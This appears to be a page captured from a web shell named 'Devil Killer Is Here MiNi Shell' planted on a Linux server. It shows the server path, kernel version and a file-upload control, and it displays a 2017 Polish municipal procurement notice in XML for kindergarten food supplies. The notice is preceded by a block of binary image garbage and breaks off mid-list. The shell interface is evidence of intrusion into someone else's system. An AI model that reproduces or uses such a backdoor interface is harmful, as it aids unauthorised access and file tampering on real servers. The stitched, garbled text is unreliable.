JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/frontend/runtime/temp/20170131/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/frontend/runtime/temp/20170131/17517_2017.xml

<?xml version="1.0" encoding="utf-8"?><ZP-400><biuletyn>2017</biuletyn><pozycja>17517</pozycja><data_publikacji>2017-01-31</data_publikacji><nazwa>Gmina i Miasto  Szadek</nazwa><ulica>ul. Warszawska</ulica><nr_domu>3</nr_domu><nr_miesz></nr_miesz><miejscowosc>Szadek</miejscowosc><kod_poczt>98240 </kod_poczt><panstwo>Polska</panstwo><wojewodztwo>łódzkie</wojewodztwo><tel>438 215 004</tel><fax>438 215 773</fax><email>urzad@ugimszadek.pl</email><internet></internet><adres_strony_internetowej_narzedzia></adres_strony_internetowej_narzedzia><adres_strony_url></adres_strony_url><podmiot2c></podmiot2c><regon>73093446000000</regon><e_mail></e_mail><ogloszenie>Ogłoszenie o zamówieniu</ogloszenie><czy_obowiazkowa>T</czy_obowiazkowa><zamieszczanie_obowiazkowe>T</zamieszczanie_obowiazkowe><nazwa_projektu_programu></nazwa_projektu_programu><czy_ubiegac_zaklady_pracy /><minimalny_procent_zatrudnienia></minimalny_procent_zatrudnienia><czy_przeprowadza_centralny_zamawiajacy /><czy_przeprowadza_podmiot_zamawiajacy_powierzyl /><zamawiajacy_powierzyl></zamawiajacy_powierzyl><czy_przeprowadza_wapolnie /><przeprowadza_wapolnie_podmiot1></przeprowadza_wapolnie_podmiot1><przeprowadza_wapolnie_podmiot2></przeprowadza_wapolnie_podmiot2><czy_przeprowadza_zamawiajacy_z_eu /><postepowanie_wspolne_tresc></postepowanie_wspolne_tresc><informacje_dodatkowe_zamawiajacy></informacje_dodatkowe_zamawiajacy><dotyczy>1</dotyczy><adres_dyn_zak></adres_dyn_zak><rodzaj_zam>administracja samorządowa</rodzaj_zam><wspolne_udzielanie_zamowienia></wspolne_udzielanie_zamowienia><czy_dostep_dokumentow_zamowienia /><dostep_dokumentow_zamowienia>www.szadek.biuletyn.net</dostep_dokumentow_zamowienia><czy_zamieszczona_bedzie_specyfikacja /><zamieszczona_bedzie_specyfikacja>www.szadek.biuletyn.net</zamieszczona_bedzie_specyfikacja><czy_dostep_do_dokumentow_ograniczony /><czy_wymagane_przeslanie_ofert>T</czy_wymagane_przeslanie_ofert><wymagane_przeslanie_ofert_inny>W formie pismnej</wymagane_przeslanie_ofert_inny><czy_podzielone_na_czesci>T</czy_podzielone_na_czesci><oferty_lub_wnioski>Wszystkie</oferty_lub_wnioski><maksymalna_liczba_czesci></maksymalna_liczba_czesci><zastrezega_prawo_grup_czesci></zastrezega_prawo_grup_czesci><maksymalna_liczba_czesci_jednemu_wykonawcy></maksymalna_liczba_czesci_jednemu_wykonawcy><dostep_do_dokumentow_ograniczony></dostep_do_dokumentow_ograniczony><czy_oferty_wnioski_dostepne /><oferty_wnioski_dostepne></oferty_wnioski_dostepne><czy_dopuszczone_wymagane_przeslanie_ofert /><dopuszczone_wymagane_przeslanie_ofert_inny></dopuszczone_wymagane_przeslanie_ofert_inny><dopuszczone_wymagane_przeslanie_ofert_adres>Urząd Gminy i Miasta Szadek, ul. Warszawska 3, 98-240 Szadek</dopuszczone_wymagane_przeslanie_ofert_adres><czy_komunikacja_elektroniczna_wymaga /><komunikacja_elektroniczna_wymaga></komunikacja_elektroniczna_wymaga><wymagania_dotyczace_rejestracji_wyk_aukcja></wymagania_dotyczace_rejestracji_wyk_aukcja><nazwa_zamowienia>Postępowanie o udzielenie zamówienia publicznego w trybie przetargu nieograniczonego o wartości powyżej 30 000 Euro, nieprzekraczającej 209 000 Euro na dostawę artykułów żywnościowych dla Publicznego Przedszkola w Szadku

</nazwa_zamowienia><numer_referencyjny>3/17</numer_referencyjny><czy_dialog_techniczny /><rodz_zam>D</rodz_zam><przedmiot_zam>Przedmiotem niniejszego zamówienia jest sukcesywna dostawa artykułów żywnościowych w roku 2017 dla Publicznego Przedszkola w Szadku. Przedmiot zamówienia został podzielony na 10 części. Szczegółowy opis znajduje się w SIWZ</przedmiot_zam><cpv1c>15000000-8</cpv1c><cpv2c></cpv2c><okres2c>31/12/2017</okres2c><szacunkowa_wart_zam_calosc></szacunkowa_wart_zam_calosc><waluta_calosc></waluta_calosc><czy_przewiduje_udzielenie_zamowien_67 /><czy_przewiduje_udzielenie_zamowien_67_tekst></czy_przewiduje_udzielenie_zamowien_67_tekst><czy_czesci /><czy_czesci_wymaga /><ilosc_czesci></ilosc_czesci><ilosc_czesci_max></ilosc_czesci_max><czy_wariant /><czy_uzup /><zam_uzupelniajace></zam_uzupelniajace><czas>
        O
      </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_zak></data_zak><ii_2_lub_temp></ii_2_lub_temp><informacje_na_temat_katalogow></informacje_na_temat_katalogow><okreslenie_warunkow>Zamawiający nie stawia warunku w tym zakresie</okreslenie_warunkow><informacje_dodatkowe_okreslenie_warunkow></informacje_dodatkowe_okreslenie_warunkow><sytuacja_finansowa_okreslenie_warunkow>Zamawiający nie stawia warunku w tym zakresie</sytuacja_finansowa_okreslenie_warunkow><sytuacja_finansowa_informacje_dodatkowe></sytuacja_finansowa_informacje_dodatkowe><zdolnosc_techniczna_okreslenie_warunkow>Zamawiający nie stawia warunku w tym zakresie</zdolnosc_techniczna_okreslenie_warunkow><zdolnosc_techniczna_informacje_dodatkowe></zdolnosc_techniczna_informacje_dodatkowe><czy_zdolnosc_techniczna_wymaga_wykonawcow /><czy_zamawiajacy_przewiduje_wykluczenie>N</czy_zamawiajacy_przewiduje_wykluczenie><art_24_ust_5_pkt_1 /><art_24_ust_5_pkt_2 /><art_24_ust_5_pkt_3 /><art_24_ust_5_pkt_4 /><art_24_ust_5_pkt_5 /><art_24_ust_5_pkt_6 /><art_24_ust_5_pkt_7 /><art_24_ust_5_pkt_8 /><czy_oswiadczenie_niepodleganiu_wykluczenia>T</czy_oswiadczenie_niepodleganiu_wykluczenia><czy_oswiadczenie_spelnienie_kryteriow /><zaliczka /><uprawnienie></uprawnienie><wiedza></wiedza><potencjal></potencjal><zdolne></zdolne><sytuacja></sytuacja><sprawozdanie_calosc></sprawozdanie_calosc><lata_obrotowe></lata_obrotowe><oswiadczenie_potwierdzenia_1 /><oswiadczenie_potwierdzenia_2 /><oswiadczenie_potwierdzenia_3 /><oswiadczenie_potwierdzenia_4 /><oswiadczenie_potwierdzenia_5 /><oswiadczenie_potwierdzenia_6 /><oswiadczenie_potwierdzenia_7 /><oswiadczenie_potwierdzenia_8 /><oswiadczenie_potwierdzenia_9 /><oswiadczenie_potwierdzenia_10 /><oswiadczenie_wykluczenia_1 /><oswiadczenie_wykluczenia_2 /><oswiadczenie_wykluczenia_3 /><oswiadczenie_wykluczenia_4 /><oswiadczenie_wykluczenia_5 /><oswiadczenie_wykluczenia_6 /><oswiadczenie_wykluczenia_7 /><dok_podm_zag_1 /><dok_podm_zag_2 /><dok_podm_zag_3 /><dok_podm_zag_4 /><dok_potw_1 /><dok_potw_2 /><dok_potw_3 /><dok_potw_4 /><dok_potw_5 /><dok_potw_6 /><inne_dok_potw></inne_dok_potw><inne_dokumenty></inne_dokumenty><niepelnosprawne /><oswiadczenie_przedlozyc /><inne_dokumenty></inne_dokumenty><wykaz_dokumentow_zaswiadczen></wykaz_dokumentow_zaswiadczen><zakresie_warunkow_udzialu></zakresie_warunkow_udzialu><zakresie_kryteriow_selekcji></zakresie_kryteriow_selekcji><inne_dokumenty_niewymienione></inne_dokumenty_niewymienione><wykaz_potwierdzenie_okolicznosci></wykaz_potwierdzenie_okolicznosci><wadium></wadium><czy_wadium>N</czy_wadium><przewiduje_udzielenie_zaliczek></przewiduje_udzielenie_zaliczek><czy_przewiduje_udzielenie_zaliczek>N</czy_przewiduje_udzielenie_zaliczek><zlozenie_katalogow_elektronicznych_informacje_dodatkowe></zlozenie_katalogow_elektronicznych_informacje_dodatkowe><czy_dopuszcza_zlozenie_katalogow_elektronicznych>N</czy_dopuszcza_zlozenie_katalogow_elektronicznych><czy_wymaga_zlozenie_katalogow_elektronicznych>N</czy_wymaga_zlozenie_katalogow_elektronicznych><czy_wymaga_zlozenie_oferty_wariantowej>N</czy_wymaga_zlozenie_oferty_wariantowej><czy_dopuszcza_zlozenie_oferty_wariantowej>N</czy_dopuszcza_zlozenie_oferty_wariantowej><czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej>N</czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej><liczba_wyk></liczba_wyk><minimalna_liczba_wykonawcow></minimalna_liczba_wykonawcow><maksymalna_liczba_wykonawcow></maksymalna_liczba_wykonawcow><wybor_wyk></wybor_wyk><kod_trybu>PN</kod_trybu><z_kim_umowa_bedzie_zawarta /><czy_ograniczenie_liczby_uczestnikow /><ograniczenie_liczby_uczestnikow></ograniczenie_liczby_uczestnikow><ograniczenie_liczby_uczestnikow_informacje_dodatkowe></ograniczenie_liczby_uczestnikow_informacje_dodatkowe><czy_obejmuje_ustanowienie /><obejmuje_ustanowienie></obejmuje_ustanowienie><obejmuje_ustanowienie_informacje_dodatkowe></obejmuje_ustanowienie_informacje_dodatkowe><czy_pobranie_umowy_ramowej_dynamicznego_katalogow /><czy_umowy_ramowej_dynamicznego_katalogow /><czy_zmiana_umowy>N</czy_zmiana_umowy><zmiana_umowy></zmiana_umowy><kryt_cena></kryt_cena><kryt_0>Cena</kryt_0><kryt_0p>60</kryt_0p><czy_aukcja /><aukcja_dod_info></aukcja_dod_info><elementy_aukcji_elektronicznej></elementy_aukcji_elektronicznej><ograniczenia_do_przedstawianych_wartosci></ograniczenia_do_przedstawianych_wartosci><informaje_udostepnione_wykonawcom></informaje_udostepnione_wykonawcom><informaje_przebiegu_aukcji></informaje_przebiegu_aukcji><warunki_do_licytacji></warunki_do_licytacji><wykorzystanie_sprzetu_elektronicznego></wykorzystanie_sprzetu_elektronicznego><spec_www></spec_www><spec_war></spec_war><potrzeb></potrzeb><wys_nagrod></wys_nagrod><harm_diag_kon></harm_diag_kon><pod_kon_etapy></pod_kon_etapy><data_skl>08/02/2017</data_skl><godz_skl>10:00</godz_skl><miejsce></miejsce><IV_4_4_jezyki></IV_4_4_jezyki><termin>
        on
      </termin><okres_liczba_dni>30</okres_liczba_dni><okres_data_do></okres_data_do><le_adres_aukcja></le_adres_aukcja><le_adres_opis></le_adres_opis><le_wymagania></le_wymagania><le_postapien></le_postapien><licytacja_etapy></licytacja_etapy><czas_trwania></czas_trwania><etap_1></etap_1><etap_1_c></etap_1_c><le_czy_nast /><licytacja_etapya></licytacja_etapya><czas_trwania></czas_trwania><etap_1></etap_1><etap_1_c></etap_1_c><le_czy_nasta /><warunki_zamkniecia_aukcji></warunki_zamkniecia_aukcji><zastosowanie_procedury_pzp>T</zastosowanie_procedury_pzp><IV_3_1_minimalne_wymagania></IV_3_1_minimalne_wymagania><IV_3_1_Przewidziane_jest_zastrzezenie /><IV_3_1_Przewidziany_podzial /><IV_3_1_etapy_negocjacji></IV_3_1_etapy_negocjacji><IV_3_1_dodatkowe_informacje></IV_3_1_dodatkowe_informacje><IV_3_2_opis_potrzeb></IV_3_2_opis_potrzeb><IV_3_2_informacja_wysokosc_nagrod></IV_3_2_informacja_wysokosc_nagrod><IV_3_2_wstepny_harmonogram></IV_3_2_wstepny_harmonogram><IV_3_2_PodzialDialogu /><IV_3_2_EtapyDialogu></IV_3_2_EtapyDialogu><IV_3_2_DodatkoweInformacje></IV_3_2_DodatkoweInformacje><IV_3_3_ElementyOpisu></IV_3_3_ElementyOpisu><IV_3_3_PodzialNegocjacji /><IV_3_3_DodatkoweInfo></IV_3_3_DodatkoweInfo><IV_IstotnePostanowienia></IV_IstotnePostanowienia><IV_LicytacjeDodatkoweInformacje></IV_LicytacjeDodatkoweInformacje><IV_6_1_sposob_udostepniania></IV_6_1_sposob_udostepniania><IV_6_1_srodki_ochrony></IV_6_1_srodki_ochrony><IV_6_2_SkrocenieTerminu>N</IV_6_2_SkrocenieTerminu><IV_6_2_Powody></IV_6_2_Powody><IV_6_6></IV_6_6><IV_6_5>N</IV_6_5><le_data_skl /><le_godz_skl /><le_miejsce_skl /><le_term_otw /><le_term_war_zam></le_term_war_zam><wym_zab_umowy></wym_zab_umowy><istotne_post></istotne_post><inf_dodat /><czy_uniewaznienie /><informacje_o_ustanowieniu_dds></informacje_o_ustanowieniu_dds><adres_poczty_internetowej_dds></adres_poczty_internetowej_dds><informacje_dotyczace_partnerstwa_innowacyjnego></informacje_dotyczace_partnerstwa_innowacyjnego><czesci><cz_0><nr_czesci>1</nr_czesci><nazwa>Przetwory sypkie</nazwa><opis>Lp.	Artykuły spożywcze	Objętość produktu	Jednostka miary	Ilość szacunkowa
1.		Cukier  biały kryształ	1 kg	kg	330
2.		Proszek do pieczenia	15 g	szt	10
3.		Drożdże piekarskie świeże	100g	szt	20
4.		Mąka pszenna   typu  480	1 kg	kg	270
5.		Mąka ziemniaczana	1kg	kg	10
6.		Ryż biały długi	1 kg	kg	200
7.		Kasza manna zwykła	1 kg	kg	10
8.		Kasza jęczmienna gruba	1 kg	kg	30
9.		Kasza gryczana	1 kg	kg	70
10.		Sól morska o obniżonej zawartości sodu -      sól potasowa KCL 30% 	350g	szt	180
11.		Pieprz mielony	20 g	szt	80
12.		Pieprz ziarnisty	20 g	szt	50
13.		Papryka słodka mielona	20 g	szt	50
14.		Majeranek suszony	  8 g	szt	60
15.		Liść laurowy suszony	 6 g	szt	60
16.		Ziele angielskie suszone	15g	szt	40
17.		Kwasek cytrynowy spożywczy w proszku	50 g	szt	50
18.		Groszek konserwowy w puszce	400 g	szt	15
19.		Kukurydza konserwowa w puszce	400 g	szt	10
20.		Sos sałatkowy w proszku ziołowo- koperkowy	  9 g	szt	   100
21.		Imbir w proszku	20 g	szt	30
22.		Gałka muszkatołowa w proszku	15 g	szt	30
23.		Tymianek	20g	szt	30
24.		Czosnek w proszku	20g	szt	30
25.		Sos do spaghetti  w słoiku	500 g	szt	130
26.		Sos grzybowy w proszku bez konserwantów	20 g	szt	30
27.		Rodzynki gat.1 sułtanki	500 g	szt	10
28.		Koncentrat pomidorowy 30% (o zawartości węglowodanów 13,92g w 100g produktu)	190g	szt	220
29.		Ketchup łagodny  bez konserwantów 	0470 g	szt	20
30.		Syrop  malinowy z zagęszczonego soku, bezglutenowy	430 ml	szt	30
31.		Syrop  z czarnej porzeczki z zagęszczonego soku, bezglutenowy	430 ml	szt	30
32.		Kompot wiśniowy ( słoik)	900ml	szt	220
33.		Kompot z czarnej porzeczki ( słoik)	900ml	szt	220
34.		Bułka tarta pszenna jasna	0.5 kg	szt	130
35.		Makaron świderki 	  1kg	szt	200
36.		Makaron rosołowy nitka 5 jajeczny	250 g	szt	100
37.		Makaron do spaghetti 	400 g	szt	220
38.		Koncentrat buraczkowy  min.59 % 	330 ml	szt	 40
39.		Olej rzepakowy  	1l	szt	100
40.		Barszcz biały w płynie	500ml	szt	120
41.		Żurek w proszku bez konserwantów	20 g	szt	 50
42.		Musztarda popularna	190 g	szt	  5  
43.		Chrzan tarty słoik bez dodatków	290 g	szt	  5 
44.		Majonez 	400 g	szt	40
45.		Kisiel  z sokiem owocowym bez sztucznych barwników ( różne smaki) na 3/4 litra wody	58 g	szt	    600
46.		Budyń bez sztucznych barwników ( różne smaki) na ¾ litra wody	65g	szt	     300
47.		Herbata  czarna w saszetkach	100 szt.	szt	15
48.		Herbata miętowa w saszetkach	20 szt	szt	10
49.		Galaretka bez sztucznych barwników ( różne smaki)	79 g	szt	200
50.		Dżem niskosłodzony z kawałkami owoców (różne smaki)- słodzony zagęszczonym sokiem jabłkowym.	220g	szt	80
51.		Pasztet drobiowy bez dodatków	131 g	szt	120
52.		Ciastka zbożowe bez cukru	135g	szt	60
53.		Herbatniki bez cukru	350 g	szt	30
54.		Wafle ryżowe naturalne 	130g	szt	80
55.		Płatki zbożowe na mleko ,czekoladowe i nie czekoladowe, miodowe, cynamonowe  (zawartością fosfor 142mg  w 100g produktu)	500 g	szt	70
56.		Płatki kukurydziane na mleko  kukurydziane	500g	szt	20
57.	Z	Zbożowe poduszeczki z nadzieniem różne smaki	500 g	szt	20
58.		Kawa zbożowa	150 g	szt	20
59.		Kakao rozpuszczalne ( o zawartości magnezu 247 mg w 100g produktu)	500g	szt	20
60.		Miód duży ( pszczeli wielokwiatowy naturalny)	1300g	szt	30

</opis><informacje_dodatkowe></informacje_dodatkowe><szacunkowa_wartosc_zamowienia_zal></szacunkowa_wartosc_zamowienia_zal><waluta_zal></waluta_zal><cpv1c>15800000-6</cpv1c><czas>
              O
            </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_kon>31/12/2017</data_kon><kryt_cena></kryt_cena><kryt_1>Cena</kryt_1><kryt_1p>60</kryt_1p></cz_0><cz_1><nr_czesci>2</nr_czesci><nazwa>Warzywa i owoce</nazwa><opis>Lp.	Artykuły spożywcze	Objętość produktu	Jednostka miary	Ilość szacunkowa
1.		Ziemniaki jadalne, nie pastewne,                                              	1kg	kg	4000
2.		Ziemniaki młode	1kg	kg	 300
3.		Marchew  	1kg	kg	 800
4.		Pietruszka 	1kg	kg	 240
5.		Seler 	1kg	kg	 250
6.		Por  	1kg	kg	 120
7.		Cebula biała	1kg	kg	  40
8.		Kapusta biała 	1kg	kg	120
9.		Kapusta młoda	1kg	szt	 40
10.		Kapusta czerwona 	1kg	kg	 20
11.		Kapusta pekińska 	1kg	kg	100
12.		Kapusta kiszona	1kg	kg	100
13.		Groch łupany	1kg	kg	 20
14.		Fasola średni Jaś 	1kg	kg	 15
15.		Burak ćwikłowy	1kg	kg	200
16.		Ogórek kiszony	1kg	kg	200
17.		Ogórek konserwowy słoik	900ml	szt	10
18.		Ogórek zielony 	1kg	kg	80
19.		Pomidor 	1kg	kg	100
20.		Papryka  świeża	1kg	kg	35
21.		Papryka konserwowa słoik	900ml	szt	10
22.		Sałata główka	1	szt.	70
23.		Kalafior główka	1	szt.	80
24.		Jabłko 	1kg	kg	400
25.		Cytryna 	1kg	kg	40
26.		Pieczarki  	1kg	kg	30
27.		Szczypior ( pęczek)	1	szt.	100
28.		Natka pietruszki ( pęczek)	1	szt.	100
29.		Koperek (pęczek)	1	szt.	100
30.		Rzodkiewka  (pęczek)	1	szt.	100
31.		Brokuł 	1	szt	50
32.		Fasola szparagowa  zielona 	1kg	kg	50
33.		Truskawki świeże 	1kg	kg	100
34.		Banan 	1kg	kg	100
35.		Mandarynka 	1kg	kg	 60
36.		Śliwka 	1kg	kg	 50
37.		Gruszka 	1kg	kg	100
38.		Winogrono	1kg	kg	50
39.		Pomarańcze	1kg	kg	50
40.		Brzoskwinia lub nektarynka	1kg	kg	40
41.		Czereśnie lub wiśnie	1kg	kg	30
42.		Kiwi koszyk	1	szt	15

</opis><informacje_dodatkowe></informacje_dodatkowe><szacunkowa_wartosc_zamowienia_zal></szacunkowa_wartosc_zamowienia_zal><waluta_zal></waluta_zal><cpv1c>15300000-1</cpv1c><czas>
              O
            </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_kon>31/12/2017</data_kon><kryt_cena></kryt_cena><kryt_1>Cena</kryt_1><kryt_1p>60</kryt_1p></cz_1><cz_2><nr_czesci>3</nr_czesci><nazwa>Jaja</nazwa><opis>Lp.	Artykuły spożywcze	 Objętość produktu	Jednostka miary	Ilość szacunkowa
1.	Jaja świeże duże kl. L chowu ściółkowego	65-70 g	szt	5000

</opis><informacje_dodatkowe></informacje_dodatkowe><szacunkowa_wartosc_zamowienia_zal></szacunkowa_wartosc_zamowienia_zal><waluta_zal></waluta_zal><cpv1c>15100000-9</cpv1c><czas>
              O
            </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_kon>31/12/2017</data_kon><kryt_cena></kryt_cena><kryt_1>Cena</kryt_1><kryt_1p>60</kryt_1p></cz_2><cz_3><nr_czesci>4</nr_czesci><nazwa>Pieczywo</nazwa><opis>Lp.	Artykuły spożywcze	 Objętość produktu	Jednostka miary	Ilość szacunkowa
1.		Chleb pszenno-żytni krojony	700 g	szt	200
2.		Chleb żytni krojony	700g	szt	200
3.		Chleb pszenny krojony	500g	szt	200
4.		Chleb razowy krojony	700g	Szt 	200
5.		Bułka duża pszenna	100 g	szt	400
6.		Bułka mała pszenna	50g	szt	200
7.		Bułka razowa	50g	szt	200
8.		Chałka  drożdżowe pieczywo pszenne	400 g	szt	200
9.		Angielka krojona 	400 g	szt	80
10.		Rogal z marmoladą	60g	szt	200

</opis><informacje_dodatkowe></informacje_dodatkowe><szacunkowa_wartosc_zamowienia_zal></szacunkowa_wartosc_zamowienia_zal><waluta_zal></waluta_zal><cpv1c>15800000-6</cpv1c><czas>
              O
            </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_kon>31/12/2017</data_kon><kryt_cena></kryt_cena><kryt_1>Cena</kryt_1><kryt_1p>60</kryt_1p></cz_3><cz_4><nr_czesci>5</nr_czesci><nazwa>Nabiał</nazwa><opis>Lp.	Artykuły spożywcze	Objętość produktu	Jednostka miary	Ilość szacunkowa
1.		Masło zawartość tłuszczu  82%	250g	szt	500
2.		Mleko  3,2%  UHT	1l.	litry	3200
3.		Maślanka naturalna	1l	szt	120
4.		Śmietana 30% 	500ml	szt	20
5.		Śmietana 12% 	400 ml	szt	250
6.		Jogurty naturalny	370 g	szt	120
7.		Jogurt owocowy ( różne smaki) zawierający kawałki owoców 0% tłuszczu i cukru	125 g	szt	500
8.		Twaróg półtłusty kl I	250g	szt	900
9.		Twarożek kanapkowo- sernikowy nie wymagający mielenia	200g	szt	150
10.		Ser żółty  tłusty  kl I(Gouda)	1kg	kg	30
11.		Serek ziarnisty 	200 g	szt	140
12.		Margaryna do pieczenia 	250g	szt	20
13.		Smalec 	250g	szt	70
14.		Serek waniliowy(0% tłuszczu i cukru)	125g	szt	200
</opis><informacje_dodatkowe></informacje_dodatkowe><szacunkowa_wartosc_zamowienia_zal></szacunkowa_wartosc_zamowienia_zal><waluta_zal></waluta_zal><cpv1c>15500000-3</cpv1c><czas>
              O
            </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_kon>31/10/2017</data_kon><kryt_cena></kryt_cena><kryt_1>Cena</kryt_1><kryt_1p>60</kryt_1p></cz_4><cz_5><nr_czesci>6</nr_czesci><nazwa>Drób i przetwory drobiowe</nazwa><opis></opis><informacje_dodatkowe></informacje_dodatkowe><szacunkowa_wartosc_zamowienia_zal></szacunkowa_wartosc_zamowienia_zal><waluta_zal></waluta_zal><cpv1c>15100000-9</cpv1c><czas>
              O
            </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_kon>31/12/2017</data_kon><kryt_cena></kryt_cena><kryt_1>Cena</kryt_1><kryt_1p>60</kryt_1p></cz_5><cz_6><nr_czesci>8</nr_czesci><nazwa>Ryby</nazwa><opis>Lp.	Artykuły spożywcze	Objętość produktu	Jednostka miary	Ilość szacunkowa
1	Filet z miruny	1kg	kg	60
2	Paluszki Rybne	1kg	kg	60
3	Makrela w oleju  (puszka)	170g	szt	30
4	Makrela w pomidorach ( puszka)	170g	szt	40

</opis><informacje_dodatkowe></informacje_dodatkowe><szacunkowa_wartosc_zamowienia_zal></szacunkowa_wartosc_zamowienia_zal><waluta_zal></waluta_zal><cpv1c>15100000-9</cpv1c><czas>
              O
            </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_kon>31/12/2017</data_kon><kryt_cena></kryt_cena><kryt_1>Cena</kryt_1><kryt_1p>60</kryt_1p></cz_6><cz_7><nr_czesci>9</nr_czesci><nazwa>Garmażeria nie mrożone</nazwa><opis>Lp.	Artykuły spożywcze	Objętość produktu	Jednostka miary	Ilość szacunkowa
1.		kopytka	1kg	kg	60
2.		śląskie	1kg	kg	60
3.		Pampuchy ( paczkowane)	400g	szt	100
